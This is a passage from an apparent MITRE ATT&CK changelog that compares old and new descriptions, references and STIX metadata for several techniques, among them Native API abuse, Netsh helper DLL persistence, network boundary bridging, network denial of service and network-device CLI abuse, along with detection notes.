abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 21:24:30.764000+00:00 | 2022-04-19 20:30:00.118000+00:00 |
| description | Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
| external_references[1]['source_name'] | NT API Windows | MACOS Cocoa |
| external_references[1]['description'] | The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020. | Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020. |
| external_references[1]['url'] | https://undocumented.ntinternals.net/ | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1 |
| external_references[2]['source_name'] | Linux Kernel API | Apple Core Services |
| external_references[2]['description'] | Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020. | Apple. (n.d.). Core Services. Retrieved June 25, 2020. |
| external_references[2]['url'] | https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html | https://developer.apple.com/documentation/coreservices |
| external_references[3]['source_name'] | OutFlank System Calls | macOS Foundation |
| external_references[3]['description'] | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. | Apple. (n.d.). Foundation. Retrieved July 1, 2020. |
| external_references[3]['url'] | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ | https://developer.apple.com/documentation/foundation |
| external_references[4]['source_name'] | CyberBit System Calls | OutFlank System Calls |
| external_references[4]['description'] | Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021. | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. |
| external_references[4]['url'] | https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ |
| external_references[5]['source_name'] | MDSec System Calls | GNU Fork |
| external_references[5]['description'] | MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. | Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020. |
| external_references[5]['url'] | https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html |
| external_references[6]['source_name'] | Microsoft CreateProcess | CyberBit System Calls |
| external_references[6]['description'] | Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. | Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021. |
| external_references[6]['url'] | http://msdn.microsoft.com/en-us/library/ms682425 | https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ |
| external_references[7]['source_name'] | GNU Fork | GLIBC |
| external_references[7]['description'] | Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020. | glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020. |
| external_references[7]['url'] | https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html | https://www.gnu.org/software/libc/ |
| external_references[8]['source_name'] | Microsoft Win32 | LIBC |
| external_references[8]['description'] | Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020. | Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020. |
| external_references[8]['url'] | https://docs.microsoft.com/en-us/windows/win32/api/ | https://man7.org/linux/man-pages//man7/libc.7.html |
| external_references[9]['source_name'] | LIBC | Linux Kernel API |
| external_references[9]['description'] | Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020. | Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020. |
| external_references[9]['url'] | https://man7.org/linux/man-pages//man7/libc.7.html | https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html |
| external_references[10]['source_name'] | GLIBC | MDSec System Calls |
| external_references[10]['description'] | glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020. | MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. |
| external_references[10]['url'] | https://www.gnu.org/software/libc/ | https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ |
| external_references[11]['source_name'] | Microsoft NET | Microsoft CreateProcess |
| external_references[11]['description'] | Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020. | Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. |
| external_references[11]['url'] | https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework | http://msdn.microsoft.com/en-us/library/ms682425 |
| external_references[12]['source_name'] | Apple Core Services | Microsoft Win32 |
| external_references[12]['description'] | Apple. (n.d.). Core Services. Retrieved June 25, 2020. | Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020. |
| external_references[12]['url'] | https://developer.apple.com/documentation/coreservices | https://docs.microsoft.com/en-us/windows/win32/api/ |
| external_references[13]['source_name'] | MACOS Cocoa | Microsoft NET |
| external_references[13]['description'] | Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020. | Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020. |
| external_references[13]['url'] | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1 | https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework |
| external_references[14]['source_name'] | macOS Foundation | NT API Windows |
| external_references[14]['description'] | Apple. (n.d.). Foundation. Retrieved July 1, 2020. | The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020. |
| external_references[14]['url'] | https://developer.apple.com/documentation/foundation | https://undocumented.ntinternals.net/ |
| x_mitre_data_sources[0] | Process: OS API Execution | Module: Module Load |
| x_mitre_data_sources[1] | Module: Module Load | Process: OS API Execution |
| Old Description | New Description |
|---|---|
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 18:28:07.793000+00:00 | 2022-04-20 17:09:17.363000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
| external_references[1]['source_name'] | TechNet Netsh | Demaske Netsh Persistence |
| external_references[1]['description'] | Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. | Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. |
| external_references[1]['url'] | https://technet.microsoft.com/library/bb490939.aspx | https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html |
| external_references[2]['source_name'] | Github Netsh Helper CS Beacon | TechNet Netsh |
| external_references[2]['description'] | Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017. | Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. |
| external_references[2]['url'] | https://github.com/outflankbv/NetshHelperBeacon | https://technet.microsoft.com/library/bb490939.aspx |
| external_references[3]['source_name'] | Demaske Netsh Persistence | Github Netsh Helper CS Beacon |
| external_references[3]['description'] | Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. | Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017. |
| external_references[3]['url'] | https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html | https://github.com/outflankbv/NetshHelperBeacon |
| x_mitre_detection | It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence) |
It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments. | Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 01:45:59.246000+00:00 | 2022-05-05 05:05:44.200000+00:00 |
| description | Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments. | Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments. |
| x_mitre_defense_bypassed[0] | Router ACL | Firewall |
| x_mitre_defense_bypassed[1] | Firewall | System Access Controls |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Kaspersky ThreatNeedle Feb 2021', 'description': 'Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.', 'url': 'https://securelist.com/lazarus-threatneedle/100803/'} |
| Description |
|---|
| Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:34:06.995000+00:00 | 2022-03-25 20:05:40.122000+00:00 |
| Old Description | New Description |
|---|---|
| Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) | Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 20:11:00.356000+00:00 | 2021-12-14 23:14:26.107000+00:00 |
| description | Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) | Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock) |
| external_references[1]['source_name'] | FireEye - Synful Knock | Mandiant - Synful Knock |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html | https://www.mandiant.com/resources/synful-knock-acis |
| Old Description | New Description |
|---|---|
| Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution) | Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 15:57:50.800000+00:00 | 2022-04-19 20:28:09.848000+00:00 |
| description | Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution) | Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution) |
| external_references[1]['source_name'] | Cisco Synful Knock Evolution | Cisco IOS Software Integrity Assurance - Command History |
| external_references[1]['description'] | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. | Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020. |
| external_references[1]['url'] | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices | https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 |
| external_references[2]['source_name'] | Cisco IOS Software Integrity Assurance - Command History | Cisco Synful Knock Evolution |
| external_references[2]['description'] | Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020. | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. |
| external_references[2]['url'] | https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices |
| Old Description | New Description |
|---|---|
